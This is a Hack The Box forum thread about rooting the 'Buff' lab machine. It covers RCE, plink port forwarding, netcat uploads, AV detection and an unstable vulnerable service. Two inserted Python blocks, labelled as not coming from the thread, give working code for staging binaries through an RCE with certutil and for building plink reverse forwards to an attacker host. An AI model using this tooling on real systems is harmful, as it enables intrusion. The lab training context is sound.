@ChrisBrownie55 said:
I think I'm misunderstanding what is meant by port forwarding in this instance. I assumed I'd need to be able to open up a port on a router to allow connections from the internet. Is there a way to do this with SSH tunnels?

Yes - there are lots of ways to do port forwarding but it isn't down to the router in this context.
It allows you to use the shell you have to let you pivot to internal systems.
@ChrisBrownie55 said:
And I've uploaded nc by modifying the script to read nc64.exe and send that instead. I believe it's worked but there's no way to verify as far as I can tell.

If you've modified the script to read nc64.exe, you might have broken it. The script - as written - creates a file on the fly, so your upload will actually be some hex and then a PHP command.
You need to use the RCE to upload any files you want, rather than trying to modify the RCE.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
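One way to drive the upload through the RCE instead of editing the exploit script, as an added example that is not code from this thread or from the exploit it discusses: the binary is base64-encoded, split into chunks short enough for a Windows command line, appended to a text file on the target with echo, decoded back with certutil, and then checked with certutil -hashfile against the local SHA-256, which is also the missing way to verify that the upload actually worked. The run_cmd callable (whatever executes one command through the RCE), the remote paths and the in-memory FakeWindowsShell target are assumptions for illustration; only the certutil and echo command shapes are real.

```python
import base64
import hashlib
import re
from typing import Callable, List

# cmd.exe rejects command lines longer than 8191 characters; stay well under it.
MAX_CMD_LEN = 8000


def build_upload_commands(data: bytes, remote_b64: str, remote_exe: str,
                          chunk_len: int = 4000) -> List[str]:
    """Return the cmd.exe commands that recreate `data` at `remote_exe`.

    Each echo appends one base64 chunk to `remote_b64`; there is deliberately no
    space before `>>`, otherwise cmd appends a trailing space to every line.
    `certutil -decode` turns the text file back into the original bytes.
    """
    b64 = base64.b64encode(data).decode("ascii")
    cmds = [f"echo {b64[i:i + chunk_len]}>>{remote_b64}"
            for i in range(0, len(b64), chunk_len)]
    cmds.append(f"certutil -decode {remote_b64} {remote_exe}")
    cmds.append(f"del {remote_b64}")
    for c in cmds:
        assert len(c) <= MAX_CMD_LEN, "command would exceed the cmd.exe line limit"
    return cmds


def hash_check_command(remote_exe: str) -> str:
    return f"certutil -hashfile {remote_exe} SHA256"


def hash_matches(certutil_output: str, data: bytes) -> bool:
    """Compare `certutil -hashfile` output with the local SHA-256 of `data`.

    certutil prints the digest on its own line; older builds put a space between
    every byte, so whitespace is stripped before comparing.
    """
    expected = hashlib.sha256(data).hexdigest()
    for line in certutil_output.splitlines():
        candidate = re.sub(r"\s+", "", line).lower()
        if re.fullmatch(r"[0-9a-f]{64}", candidate):
            return candidate == expected
    return False


def upload_and_verify(data: bytes, remote_b64: str, remote_exe: str,
                      run_cmd: Callable[[str], str]) -> bool:
    """Push `data` through `run_cmd` (the RCE primitive) and confirm the hash."""
    for cmd in build_upload_commands(data, remote_b64, remote_exe):
        run_cmd(cmd)
    return hash_matches(run_cmd(hash_check_command(remote_exe)), data)


class FakeWindowsShell:
    """Constructed stand-in for the target: an in-memory file system that only
    understands the commands generated above, so the example runs offline.
    A real run_cmd would send each line through the web RCE instead."""

    def __init__(self) -> None:
        self.files = {}

    def run(self, cmd: str) -> str:
        if cmd.startswith("echo ") and ">>" in cmd:
            payload, path = cmd[5:].split(">>", 1)
            self.files[path] = self.files.get(path, "") + payload + "\r\n"
            return ""
        if cmd.startswith("certutil -decode "):
            _, _, src, dst = cmd.split()
            self.files[dst] = base64.b64decode(self.files[src])  # CRLF is ignored
            return "CertUtil: -decode command completed successfully."
        if cmd.startswith("certutil -hashfile "):
            _, _, path, _ = cmd.split()
            digest = hashlib.sha256(self.files[path]).hexdigest()
            spaced = " ".join(digest[i:i + 2] for i in range(0, 64, 2))  # old-style output
            return (f"SHA256 hash of {path}:\n{spaced}\n"
                    "CertUtil: -hashfile command completed successfully.")
        if cmd.startswith("del "):
            self.files.pop(cmd[4:], None)
            return ""
        raise ValueError(f"unsupported command: {cmd}")


if __name__ == "__main__":
    sample = bytes(range(256)) * 40          # constructed payload; read the real binary in practice
    target = FakeWindowsShell()              # assumption: replace with the RCE wrapper
    ok = upload_and_verify(sample, r"C:\Windows\Temp\up.b64",
                           r"C:\Windows\Temp\up.exe", target.run)
    print("upload verified" if ok else "hash mismatch")
```

Against a real target the only thing to swap is run_cmd; keep the hash check, because a partially written or AV-quarantined file looks identical to a working one from the web shell's point of view until the digests are compared.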
@TazWake Thanks, yes. RCE of course. I am trying to move over to a proper shell; that fails (files are copied). Will check if that host works better while switching my VPN back to UDP; a couple of other issues I had were solved by switching the HTB VPN to TCP.
I hate this box, I wasted so much time enumerating and it's all just a mess. I see multiple exploits, lots of pages with lots of errors and terrible hints. I don't know what the deal is.
Ha just realized what I overlooked immediately after posting this.
Hi all. I have tested the software of the exe I found on the system on my own Windows system and can get a reverse shell from it with the converted script. But once I run it on Buff itself I get the following error: AttributeError: module 'sys' has no attribute 'exc_value'. So that didn't look important and I removed it and tested it on my local Windows box and it worked fine. But on Buff, which is also the same Windows architecture and version, it doesn't work. I have tried 5 times. I am sure I have the right exploit because it also listens on the same port.
@Parker said:
Hi all. I have tested the software of the exe I found on the system on my own Windows system and can get a reverse shell from it with the converted script.

IMHO it is a lot easier to set up port forwarding and run the exploit on your machine rather than try to get a compiled executable to work in the Buff environment.
@Parker said:
But once I run it on Buff itself I get the following error: AttributeError: module 'sys' has no attribute 'exc_value'. So that didn't look important and I removed it and tested it on my local Windows box and it worked fine. But on Buff, which is also the same Windows architecture and version, it doesn't work.

That seems to imply it was important or the script is wrong.
@Parker said:
I have tried 5 times. I am sure I have the right exploit because it also listens on the same port.

There are lots of exploits which listen on this port. Double-check your assumptions if it isn't working. Maybe even try other ones.
I was trying this exact method now. I have a port forward to the port and am running the script locally. I have changed the port in the script to point to my local port that is connected to the port forward on Buff. It doesn't seem to work. I will try to play around with it. I am using a standard port forward from Buff using p****.*** to my system, which works fine.
Seems the service is no longer running. I guess I have to revert.
This service is never up. Does it ever restart on its own again?
@TazWake Thanks for all the help. I think I will try a different box as this service doesn't seem to come back up much. Maybe I should just pay for a subscription again to get access to different versions of the VM with fewer people on it.
I don't know if I'm in a rabbit hole for root; is clxxxxx.exx the way to go? Because I tried different exploits but none of them work. And yes, I forward the ports using pxxxx.exx. Any nudge please, I'm stuck.
Pretty cool box with easy user. However, I had a really hard time getting root, just because the vulnerable service was constantly crashing...
Besides, I found Windows boxes way more unstable than Linux.
@amoraca11 said:
I don't know if I'm in a rabbit hole for root; is clxxxxx.exx the way to go? Because I tried different exploits but none of them work. And yes, I forward the ports using pxxxx.exx. Any nudge please, I'm stuck.

If you read the post above yours you can see that other people are having similar issues.
You are on the right path. If it doesn't work, you need to narrow down the reason why it hasn't worked:
You've used the wrong exploit
You've configured the exploit incorrectly
The port forward didn't work
The service might be broken by other people launching random attacks against it
There might be service instability from people randomly trying to start the service themselves
Being able to troubleshoot an attack is a great skill to develop. Try not to let frustration cloud your analysis.
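A way to work through that checklist before blaming the exploit, as an added example that is not code from this thread or from any exploit script: probe the local end of the forward and report what the socket actually says. This also covers the sys.exc_value error quoted earlier in the thread: in Python 2 that attribute held the exception currently being handled, Python 3 removed it, so a converted script that prints it inside a bare except only dies with that AttributeError after the connect has already failed, and deleting the line merely hides the real error. The probe distinguishes a refused connection (nothing listening on the local port, so the forward is not up or the service behind it has crashed) from a timeout, the poll helper waits for a service that restarts, and the plink builder is the reverse forward this thread relies on. Host names, ports and credentials below are placeholders, and the local listener exists only so the example runs offline.

```python
import socket
import sys
import time
from dataclasses import dataclass
from typing import Callable, Optional, Tuple


@dataclass
class ProbeResult:
    status: str   # "open", "refused", "timeout" or "error"
    detail: str   # human-readable reason taken from the real exception


def probe_forward(host: str, port: int, timeout: float = 3.0) -> ProbeResult:
    """TCP-connect to host:port and say why it failed, if it failed.

    Catching OSError and reporting the exception object is the Python 3
    replacement for Python 2's `print "Error: " + str(sys.exc_value)`; a bare
    `except:` that touches sys.exc_value raises AttributeError on Python 3.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return ProbeResult("open", f"something accepted the connection on {host}:{port}")
    except ConnectionRefusedError as e:
        return ProbeResult("refused", f"nothing listening at {host}:{port}: {e}")
    except socket.timeout:
        return ProbeResult("timeout", f"no answer from {host}:{port} within {timeout}s")
    except OSError:
        # Python 3 equivalent of sys.exc_value: the exception being handled.
        return ProbeResult("error", str(sys.exc_info()[1]))


def wait_until_open(host: str, port: int, attempts: int, delay: float = 1.0,
                    probe: Callable[[str, int], ProbeResult] = probe_forward) -> ProbeResult:
    """Poll the forwarded port; useful when the service crashes and restarts."""
    result = probe(host, port)
    for _ in range(attempts - 1):
        if result.status == "open":
            break
        time.sleep(delay)
        result = probe(host, port)
    return result


def plink_reverse_forward(attacker_ip: str, user: str, password: str,
                          target_port: int, local_port: Optional[int] = None) -> str:
    """Build the plink command to run on the target so that 127.0.0.1:local_port
    on the attacker reaches 127.0.0.1:target_port on the target.

    `-R listen:host:port` asks the attacker's sshd to open the listener; without
    GatewayPorts it binds to loopback there, which is exactly what an exploit run
    locally against 127.0.0.1 needs. `echo y |` answers the host-key prompt.
    """
    local_port = target_port if local_port is None else local_port
    return (f"echo y | plink.exe -ssh -l {user} -pw {password} "
            f"-R {local_port}:127.0.0.1:{target_port} {attacker_ip}")


def open_local_listener() -> Tuple[socket.socket, int]:
    """Constructed stand-in for a forwarded service: a loopback listener on a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    # Placeholder values: attacker VPN address, sshd account on the attacker, target service port.
    print(plink_reverse_forward("10.10.14.5", "kali", "secret", 1234))
    srv, port = open_local_listener()
    print(probe_forward("127.0.0.1", port))   # open, the listener stands in for the forward
    srv.close()
    print(probe_forward("127.0.0.1", port))   # refused, same result as a dead forward or crashed service
```

Run the probe against the local end of the forward right before launching the exploit; if it reports refused, the exploit cannot have reached the service, so the forward or the service is the problem, not the payload. A reverse forward needs an sshd listening on the attacker side, and plink exits when the target shell closes, so start it from a shell that stays open.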
I think the machine's user flag was the fastest I've ever got. The nmap scan lasted longer than that. It's a really nice entry-level machine, it doesn't get more by-the-book than that.
The privesc gets cloudy, but when you actually read the exploit you'll see where it's going. I was stuck for a few hours on "Connection Refused", then I read a similar trouble googling it and all I had to do was to download the newest version of the p****.**e on their website and the whole privesc attack worked.
The AV catches literally everything I have dropped on this box. Any msfvenom payload; nc.exe; nc64.exe; PowerShell one-liners, even edited with different variable names...
@lebutter said:
The AV catches literally everything I have dropped on this box. Any msfvenom payload; nc.exe; nc64.exe; PowerShell one-liners, even edited with different variable names...

Double-check this. I didn't realise any AV was running.
It's very unusual for a server to have less than 50% root flags compared to users. Now I get it... I've tried 4 or 5 versions of the exploit, specifically the one clearly mentioned as "tested on Win10 x64"... I have never even been able to get even a simple "ping -n 1" back. And yes, my port-fw works fine, both with p*** and chi***.
As to the AV, funnily it catches the netcat that you find on the web but it doesn't catch the one included in Kali.
Terrible box. I had a go at this around its release date and could not make any progress due to other people crashing the exploitable service all the time. Decided to come back to it later when there were less people on it, and discovered it doesn't really matter - the service in question crashes repeatedly on its own - being able to exploit it is literally just a matter of dumb luck.
Complete waste of time, do not even bother with this box, it is trash.
@shogunx said:
Terrible box. I had a go at this around its release date and could not make any progress due to other people crashing the exploitable service all the time. Decided to come back to it later when there were less people on it, and discovered it doesn't really matter - the service in question crashes repeatedly on its own - being able to exploit it is literally just a matter of dumb luck.
Complete waste of time, do not even bother with this box, it is trash.

I had so many problems with the service that I restarted the box... well, on a clean box (and I'm on VIP), that localservice wasn't running any more at all! I'm giving it a last try now but will move on to other things if that doesn't work.
The privilege escalation path was really painful, I had to restart the box at least 5 times to get the exploit to work. Other than that fun box.
It's even nastier than that, because the service automatically restarts, or at least appears under a different PID... I therefore assumed I didn't have to care about crashes... I was wrong and wasted hours.
I have user and am working on root. I found the C*. and the correct exploit for it; however, I'm having trouble getting the p****.*** working right. Looking for some pointers if anyone is willing to help.
I can tell you what I've tried in DM, don't want to post it all here.
Thanks much!
Hello, I have an admin console in the system. However, when I go to deliver both flags, user and root, I always get an error. This happens to me in both the old and the new interface. Does it happen to anyone else? I left this machine behind a few days ago in case there was any user modifying the flags, today I tried again but I am unable to deliver the flags.
Some help over here... this is my second time that I saw the root.txt but when I try to validate it I have an error... 7ddCENSURED09 ...is this the correct flag for root or should I continue looking for another Administrator Desktop root.txt file? I did it all with the PLINK -sh and ran my exploit correctly; sometimes it is cached, other times not... but when I can keep the session open with root, I copy the flag as fast as I can but it's not working in the validator.
I'm not sure if this is an error because I validated my user flag 2 or 3 days ago.
@H4FN said:
Some help over here... this is my second time that I saw the root.txt but when I try to validate it I have an error... 7ddCENSURED09 ...is this the correct flag for root or should I continue looking for another Administrator Desktop root.txt file? I did it all with the PLINK -sh and ran my exploit correctly; sometimes it is cached, other times not... but when I can keep the session open with root, I copy the flag as fast as I can but it's not working in the validator.
I'm not sure if this is an error because I validated my user flag 2 or 3 days ago.

Did you read the post immediately before yours?
Heeey TazWake!! ... thanks bro, currently it was rooted!!
I was worried because I was not sure if I was doing it correctly for my first port forwarding with plink!!
Comments
Edit: reset box. now it works with normal shell.
@Parker said:
This service is never up. Does it ever restart on its own again?

It should but people try lots of different exploits on it so it frequently crashes.
This is my first ever box, I'm struggling a little. Can anyone PM me to offer some help?
Thank you.
@Ominousk said:
If you read through a few of the threads here you will see that this is an occasional problem. (eg: https://forum.hackthebox.eu/discussion/comment/80181/#Comment_80181)
HTB uses dynamic hashes which means they change every time the box reboots or is on a different VPN.
However, it also means that sometimes the hashes don't load properly and it creates issues.
The main suggestions seem to be:
1) reboot, repeat the pwnage, get the new flags, try them
2) report it to HTB via a JIRA ticket and see if they can fix the issue
If you've left the machine for a few days, the flags you have are incorrect and you need to repwn.
@H4FN said:
Cool.
If you get the flag though, it worked.
Rooted!!!
ping me for any hints and tips
First time playing; got the user flag after failing to understand the difference between RCE and shell, but managed it in the end.
Going for root now, but I'm pretty lost. I'm trying to enumerate everything I can find, but I feel I'm going down the rabbit hole here.
(Please, stop resetting the machine every 20 minutes...)
Need a nudge getting root. After talking with a couple of others I believe I've utilized pl. correctly; I'm just not sure what to do after that.